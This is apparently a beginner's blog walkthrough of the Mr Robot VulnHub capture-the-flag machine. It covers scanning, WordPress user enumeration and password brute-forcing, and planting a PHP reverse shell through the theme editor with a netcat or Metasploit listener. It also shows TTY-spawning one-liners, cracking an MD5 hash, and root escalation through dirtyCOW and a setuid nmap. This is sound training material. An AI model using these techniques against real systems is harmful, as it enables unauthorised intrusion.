Find the machine here on Vulnhub
If you haven’t finished getting all three Flags, don’t go any further. Do not ruin it for youself!!
BUT, I have written this for the person who has no idea how to do it, or wants new ideas.
So if you have downloaded this machine, and completely stuck, I hope this explains things well!
This is for beginners
In this walkthough, I am using ParrotSec.
I usually use Kali, so hope the pretty terminal looks good in the screenshots!
Not much is needed, I start with a typical 2 terminals, and a text editor for notes. What you use for notes, be it gedit, sublime, vim, nano, cherrytree, faraday, I don’t care, and neither should you. Don’t get tied up on the petty.
Whatever works, works!
So I have a few VM’s running on my host, but on this network, is just Parrotsec and Mr Robot.
A quick word on hosts…
It doesn’t matter what you use as a host, honestely. Again, don’t get caught up with petty stuff.
First, let’s find the IP of the Attacking Machine.
ifconfig eth0 | grep inet
Now, find the target.
2 good options, i used the latter.
nmap -sn 192.168.88.1/24
netdiscover -i eth0 -r 192.168.88.1/24
Now we enumerate all the running services.
For that, I will run a basic nmap.
nmap -p- -sV 192.168.88.129
So we have a webserver.. Lets start.
Lets look in a web browser.
That is some DAMN nice JS there!
Anyway, this gives us nothing, so it’s time to enumerate this port. Theres nikto, dirbuster, so on… I’m going to use nikto. A word of warning is that nikto is far far from perfect. I breaks, comes up with huge amounts of false positives. But I still like it.
nikto --host 192.168.88.129
Of all the stuff it brought up, what I really care about is.
A – robots.txt (always check this)
B – It has WordPress, and the login is /wp-admin/
Well, that’s a give away, let’s grab them both with wget.
And lets see out key
And the second file, is a wordlist, before I go any further, let’s look at it.
tail are used to peek at it’s content,
wc to see how long it is.
858,000 lines, that’s enough, let’s clean it up of duplicates.
Sort the file using
sort, and pipe it to
uniq to remove the dupes, and redirect stdout to a new file.
sort fsocity.dic | uniq > small.dic
And now see what size it is.
Great, only 11,415 lines!
Assuming we need this, this a great punishment for the lazy!
Run wpscan on it.
wpscan -e vp,vt -u 192.168.88.129
No point showing it’s use printout, but the point that matters is.
[!] Title: All-in-One WP Migration <= 2.0.4 - Unauthenticated Database Export Reference: https://wpvulndb.com/vulnerabilities/7857 Reference: http://www.pritect.net/blog/all-in-one-wp-migration-2-0-4-security-vulnerability Reference: https://www.rapid7.com/db/modules/auxiliary/gather/wp_all_in_one_migration_export [i] Fixed in: 2.0.5
And it has a metasploit module, let’s try that!
Since we are firing up metasploit, we need to make sure postgresql is running.
Finding the module is first, so we will search for it.
search wp_all_in should be fine. And we have found it, let’s use it.
To view how to use this module.
We can see all the settings, all we need to change is the rhost, so, let’s do that!
set rhost 192.168.88.129
exploit also works)
And it looks like it was successful!!
let’s check the file.
doing a quick
ls -al shows the file is empty. This did not work! Let’s not waste time, let’s move on!
It is very common for wordpress to have weak, and I mean, really weak logins. admin:admin, admin:password, so on.
And no way!!! How verbose is this error!
Let’s think along the social engineering route before we go the brute force route.
By that I mean, brute force route is getting a wordlist full of given names and common user names.
The Social Engineering route is, the machine is themed Mr Robot.
So, we have robot, eliot, fsociety, so on.. lets do this manually to begin with!
And it’s a win!
Now, the password. Elliot wasn’t a nub, so let’s used that supplied password list.
wpscan -u 192.168.88.129 --username elliot --wordlist /root/vulnhub/mrrobot/small.dic
Okay, 2 minutes to go through this list. Think back how big this file was. This could have taken nearly 80 times longer, 3 hours or so. And it would have taken that long, because, look at the
tail from above, and the password it was from below!
So we have elliots password!
WordPress just loves to give reverse shells!
Theres so many ways.
Let’s look at a few!
First, we have meterpreter still open, it can do it entirely.
There is a module,
Have a read. I tried it, it didn’t work, I didn’t care and went to move on, but then though making it work would be useful for you kiddies reading this, so.
Note You need to know vi, I am not going to teach you vi, but it is EASY. Just learn the basics.
That failwith line, we don’t want. Not that it’s not a fault with the plugin, this is just a unique site, so for simplicity, just remove it.
In metasploit framework, type
reload followed by
Guess what, we have a meterpreter shell!
Again, there is so many ways of doing this, it’s crazy, so heres another.
Using msfvenom, I create a reverse php shell.
Login to wordpress, go appearance, Editor, and pick one, for this example, I used page 404.
Chuck the payload in there (note I changed the port)
Set up a reverse handler in metasploit as such.
set payload php/meterpreter/reverse_tcp
and all the settings as needed, remember,
and run it with
And browse to a page. randomly, to get a 404.
Google for php reverse shell, do something similar, edit a php page and put the payload in there. Instead of metasploit, use netcat.
nc -nlvp 4444 for example.
I won’t show an example of this, as the procudure is identical, and if anything, the metasploit method is more complex.
Now we have a shell, it’s time to look around, let’s look where we are.
If you are using a meterpreter shell, just drop to shell using
Look around, have fun, theres another little gift here too!
First, I look in home…. habit, let’s just call it that!
Our second key, nice, not that we can read it (remember, we are daemon, and this is owned by robot), but we can access the hash.
No one would ever do this, but anyway.
cat passwor* robot:c3fcd3d76192e4007dfb496cca67e13b
It is a MD5 hash as claimed, let’s try google, incase it’s in a rainbow table somewhere.
And it has!
let’s login as root… but we can’t.
We need tty!
Theres lot’s of ways again, my favorites are these..
python -c 'import pty; pty.spawn("/bin/sh")'
perl —e 'exec "/bin/sh";'
So, let’s start from the top, until we get some luck!
And python delivered… on we go.
Using the new shell, let’s log in as robot.
And grab our little treasure!
Now, we need to get to root!
a quick hit at sudo said robot isn’t in sudoers group.
So we need to find another way.
Let’s use the infamous dirtyCOW since we know this is kernel is vulnerable.
Search the exploit-db for the exploit.
great, now, let’s upload it to the machine using meterpreter.
ctrl+z to background the channel.
Get the local and remote directories where we want them.
Upload the file using
Go back to our channel using
channel -i 1 (Note, screenshot shows 0, that was my error, I had to re-run it)
Now we have got the file, we compile it as instructed.
Make it executeable
chmod +x dcow
Log in as root
Do the root dance!
When this box was created, dirtyCOW was now known of, there IS another way.
We look at processes using
ps auxw, we look for setuid bits on files …….
This one was a winner, have a look!
find / -perm -4000 -type f 2>/dev/null
This is great because of nmap. Well… Maybe.
Older versions of nmap had an interactive shell, let’s try it.
Just follow the screenshot, yes, that easy!
That’s, time for the last trophy.
Thanks for this machine Jason, very well thought out.
Hope you enjoyed the walkthrough.